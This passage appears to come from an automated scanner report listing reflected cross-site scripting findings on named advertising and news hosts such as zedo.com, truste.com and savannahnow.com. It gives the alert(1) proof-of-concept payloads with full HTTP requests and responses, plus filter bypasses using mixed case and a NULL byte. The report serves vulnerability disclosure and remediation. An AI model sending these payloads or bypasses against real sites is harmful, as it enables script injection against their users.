Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 614
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:43 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='b9b1f';alert(1)//4f2061d893a,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=b9b1f';alert(1)//4f2061d893a,1a0a560b5ac81252e91
...[SNIP]...
2.30. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38af1"%3balert(1)//1c872f3fc6c was submitted in the q parameter. This input was echoed as 38af1";alert(1)//1c872f3fc6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=38af1"%3balert(1)//1c872f3fc6c&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236:305,235949|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24:0,10#0,24;expires=Wed, 12 Oct 2011 12:48:43 GMT;path=/;domain=.zedo.com;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=141
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:43 GMT
Content-Length: 6518
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='38af1";alert(1)//1c872f3fc6c,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=38af1";alert(1)//1c872f3fc6c,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


       
...[SNIP]...
2.31. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f095e'%3balert(1)//7fb6e4adbf8 was submitted in the $ parameter. This input was echoed as f095e';alert(1)//7fb6e4adbf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=f095e'%3balert(1)//7fb6e4adbf8&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 478
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:f095e';alert(1)//7fb6e4adbf8,ad769';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,91a0a560b5ee888bf58170a13;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=12:2:1:0:0:0:01a0a560b5991a4ca97d403e3;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:1a0a560b8232ac2cc4a13028;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=79
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='f095e';alert(1)//7fb6e4adbf8,ad769'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=f095e';alert(1)//7fb6e4adbf8,ad769';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...
2.32. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80c30'%3balert(1)//e63561c611c was submitted in the q parameter. This input was echoed as 80c30';alert(1)//e63561c611c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=80c30'%3balert(1)//e63561c611c&$=&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 528
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560ba8d0f92af69b0c49,5406e';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,91a0a560b5ee888bf58170a13;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=10:2:1:0:0:0:01a0a560b5991a4ca97d403e3;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:1a0a560b8232ac2cc4a13028;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=79
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='80c30';alert(1)//e63561c611c,1a0a560ba8d0f92af69b0c49,5406e'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=80c30';alert(1)//e63561c611c,1a0a560ba8d0f92af69b0c49,5406e';z="+Math.random();}

if(zzuid=
...[SNIP]...
2.33. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 9d4a0<script>alert(1)</script>dfdd840350b was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=abs01&cid=0811abs728x90&c=abs01cont199d4a0<script>alert(1)</script>dfdd840350b&w=728&h=90 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:38 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 6674
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
ntDivName:"te-clr1-1d4bc8b5-f459-45d2-9d9b-7185b46bfc5d-itl",iconSpanId:"te-clr1-1d4bc8b5-f459-45d2-9d9b-7185b46bfc5d-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"abs01cont199d4a0<script>alert(1)</script>dfdd840350b",noticeBaseUrl:"http://choices-elb.truste.com/camsg?",irBaseUrl:"http://choices-elb.truste.com/cair?",interstitial:te_clr1_1d4bc8b5_f459_45d2_9d9b_7185b46bfc5d_ib,interstitialWidth:728,interstitialHei
...[SNIP]...
2.34. http://choices.truste.com/ca [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 94f4e<ScRiPt>alert(1)</ScRiPt>241f43fb5a was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=abs01&cid=0811abs728x9094f4e<ScRiPt>alert(1)</ScRiPt>241f43fb5a&c=abs01cont19&w=728&h=90 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 6752
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<a href="http://preferences.truste.com/preference.html?affiliateId=109&pid=mec01&aid=abs01&cid=0811abs728x9094f4e<ScRiPt>alert(1)</ScRiPt>241f43fb5a&w=728&h=90" target="_blank">
...[SNIP]...
2.35. http://cm.npc-morris.overture.com/js_1_0/ [css_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cm.npc-morris.overture.com
Path:   /js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca685"><script>alert(1)</script>7a61d61a441 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685"><script>alert(1)</script>7a61d61a441&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547 HTTP/1.1
Host: cm.npc-morris.overture.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMjSyNnCxMAY6dMoAw=

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyNHF2dXM0MAI45Nxww=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 09-Sep-2021 12:48:46 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4670


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<link rel="stylesheet" href="http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685"><script>alert(1)</script>7a61d61a441" type="text/css">
...[SNIP]...
2.36. http://dailydeals.savannahnow.com/widgets/300x250 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dailydeals.savannahnow.com
Path:   /widgets/300x250

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9aab3<img%20src%3da%20onerror%3dalert(1)>b54fa5f1680 was submitted in the REST URL parameter 2. This input was echoed as 9aab3<img src=a onerror=alert(1)>b54fa5f1680 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /widgets/300x2509aab3<img%20src%3da%20onerror%3dalert(1)>b54fa5f1680 HTTP/1.1
Host: dailydeals.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.66
Date: Mon, 12 Sep 2011 12:46:15 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 80

Could not find the template: 300x2509aab3<img src=a onerror=alert(1)>b54fa5f1680
2.37. http://go.savannahnow.com/partner_json/search [jsonsp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 5a2f8<script>alert(1)</script>96b82a10b8e was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=&nbh=&rand_spn=5&st=event&jsonsp=jsp_05a2f8<script>alert(1)</script>96b82a10b8e HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:21 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 95
ETag: "dd325e227c05454e7cb9131302f53e61"
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: 40ceae8c13c9e185408d91ae53049dba4bf265fc
Z-REQUEST-HANDLED-BY: www16
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2882

jsp_05a2f8<script>alert(1)</script>96b82a10b8e('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Darius Rucker","has_tickets":true,"tickets_on_sale":null,"venue_id":854691,"id":172970805,"starttime":"Fri Sep 16 19:00:00 UTC 2011","zurl
...[SNIP]...
2.38. http://go.savannahnow.com/partner_json/search [limit parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The value of the limit request parameter is copied into the HTML document as plain text between tags. The payload %007c843<script>alert(1)</script>4e254564077 was submitted in the limit parameter. This input was echoed as 7c843<script>alert(1)</script>4e254564077 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10%007c843<script>alert(1)</script>4e254564077&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:18 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 178
ETag: "2865bab473716d7743b16d03277163cf"
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: 20dedd0ce3207e873334ffc6054c1ecef3c12fd0
Z-REQUEST-HANDLED-BY: www11
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2883

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Darius Rucker","has_tickets":true,"tickets_on_sale":null,"venue_id":854691,"id":172970805,"starttime":"Fri Sep 16 19:00:00 UTC 2011"
...[SNIP]...
e":-81.0965,"state":"GA"},"sort":0,"offset":0,"when":"","what":"","catex":null,"limit":10,"sst":1315785600},"next_page":true,"identifier": "st=event,event_spn&where=savannah%2Cga&ssi=0&ssrss=1&srss=10.7c843<script>alert(1)</script>4e254564077"}}})')
2.39. http://go.savannahnow.com/partner_json/search [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 4eca2<script>alert(1)</script>359798be485 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

